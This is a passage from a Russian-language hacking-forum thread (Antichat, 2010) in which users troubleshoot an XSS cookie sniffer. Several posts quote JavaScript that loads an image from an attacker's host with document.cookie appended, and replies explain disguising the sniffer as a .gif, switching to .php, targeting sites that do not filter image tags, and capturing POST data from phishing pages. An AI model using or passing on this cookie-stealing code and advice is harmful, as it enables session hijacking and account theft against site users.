HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #51  
Старый 29.07.2010, 01:00
M@ZAX@KEP
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами: 8903558

Репутация: 60
По умолчанию

alechka, потому что их нет, наверное)))
Когда переходишь по ссылке на s.js, записываются куки той страницы, где ты был до перехода. А если переходишь из пустого окна или только открытой новой вкладки... какие там кукисы-то? =)
ЗЫ если отчёт приходит - уже значит что всё работает))
ЗЗЫ кстати, а в сниффере везде адрес хоста-то своего вписал?
 
Ответить с цитированием

  #52  
Старый 31.07.2010, 01:00
s0llo
Новичок
Регистрация: 04.02.2010
Сообщений: 2
С нами: 8561817

Репутация: 0
По умолчанию

:cheezy::cheezy:
Цитата:

Сообщение от DNSrus

А когда подставляешь код в принтабельное поле то этот текст нужно отправлять или только написав открывать исходный код?

нужно отправлять! :cheezy:
 
Ответить с цитированием

  #53  
Старый 31.07.2010, 01:00
s0llo
Новичок
Регистрация: 04.02.2010
Сообщений: 2
С нами: 8561817

Репутация: 0
По умолчанию

Цитата:

Сообщение от DNSrus

ну я так и думал =)

https://forum.antichat.ru/thread20140.html
 
Ответить с цитированием

  #54  
Старый 31.07.2010, 01:00
s0llo
Новичок
Регистрация: 04.02.2010
Сообщений: 2
С нами: 8561817

Репутация: 0
По умолчанию

Цитата:

Сообщение от DNSrus

а еще вопрос если код выглядит так </script>alert('XSS')<script>
это значит что его отфильтровали и ничего нельзя сделать?

если отфильтровало функцией htmlspecialchars(), то ничего ни сделаешь!!!
 
Ответить с цитированием

  #55  
Старый 08.08.2010, 01:00
gangsta15
Новичок
Регистрация: 05.08.2010
Сообщений: 10
С нами: 8299766

Репутация: 0
По умолчанию

Попробовал заливать код в картинку но ничего не выходит:

Цитата:



img = new Image();
img.src = "http://yourhost.com/s.gif?"+document.cookie;




Ссылку изменяю на свою как нужно, на локальном сервере и многих других хостингах браузер показывает "поломанную" картинку, можете дать 100% рабочий пример? (файлы)
 
Ответить с цитированием

  #56  
Старый 08.08.2010, 01:00
sulikoshka
Постоянный
Регистрация: 26.04.2010
Сообщений: 459
С нами: 8445206

Репутация: 15
По умолчанию

Цитата:

Сообщение от gangsta15

Попробовал заливать код в картинку но ничего не выходит:

Ссылку изменяю на свою как нужно, на локальном сервере и многих других хостингах браузер показывает "поломанную" картинку, можете дать 100% рабочий пример? (файлы)

Браузер показывает поломанную картинку потому что это текстовый документ

вот как происходит на деле!

ну что же обьясню по порядку
во-первых создаешь просто текстовый документ
2) переимновываешь его в расширение .GIF
пример s.gif ( или какой хочешь )

3) после настраиваешь ксс под твой снифф )))

вот и все

если что то не понятно пиши
 
Ответить с цитированием

  #57  
Старый 09.08.2010, 01:00
gangsta15
Новичок
Регистрация: 05.08.2010
Сообщений: 10
С нами: 8299766

Репутация: 0
По умолчанию

Цитата:

Сообщение от sulikoshka

Браузер показывает поломанную картинку потому что это текстовый документ

вот как происходит на деле!

ну что же обьясню по порядку
во-первых создаешь просто текстовый документ
2) переимновываешь его в расширение .GIF
пример s.gif ( или какой хочешь )

3) после настраиваешь ксс под твой снифф )))

вот и все

если что то не понятно пиши

смотри) у меня есть сниффер замаскированный под картинку
s.gif

Цитата:






так же тот файл (которое мазахакер описывал) со следующим содержанием
img.gif

Цитата:



img = new Image();
img.src = "http://site/s.gif?"+document.cookie;




Так вот последний я хочу вставить на какой нибудь нужный мне сайт где изображения не обрабатываются ([img][/img]) и чтобы как описывал мазахакер, когда оно подгружаться будет - в нем будет выполняться тот код

Цитата:



img = new Image();
img.src = "http://site/s.gif?"+document.cookie;




И так на мой сниффер (s.gif) будут приходить куки, но когда я вставляю этот файл (img.gif) он отображается "поломанной картинкой" т.е. ничего не подгружается и куков он не посылает =)

P.S. Наверное запутал) Я вообще правильно понял тот способ что описывал мазахакер? (последний "абзац" в первом посте)
 
Ответить с цитированием

  #58  
Старый 09.08.2010, 01:00
M@ZAX@KEP
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами: 8903558

Репутация: 60
По умолчанию

Извиняюсь конечно, но тут есть сведения, что способ не ахти какой рабочий... T_T но вобоще попробуй вместо .gif картинки юзать .php
 
Ответить с цитированием

  #59  
Старый 11.08.2010, 01:00
M@ZAX@KEP
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами: 8903558

Репутация: 60
По умолчанию

vonkolot, не проще ли для перехвата POST-запроса использовать скрипт, аналогичный тому, который записывает данные с фейка? Суть та же самая =)
 
Ответить с цитированием

  #60  
Старый 11.08.2010, 01:00
vonkolot
Новичок
Регистрация: 06.06.2010
Сообщений: 1
С нами: 8386221

Репутация: 0
По умолчанию

у меня вопрос...пользуюсь этим снифером с начала создания темы...но как то не приходилось встречаться с POST запросами..Можно ли перехватывать этим сниффером POST запросы??
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.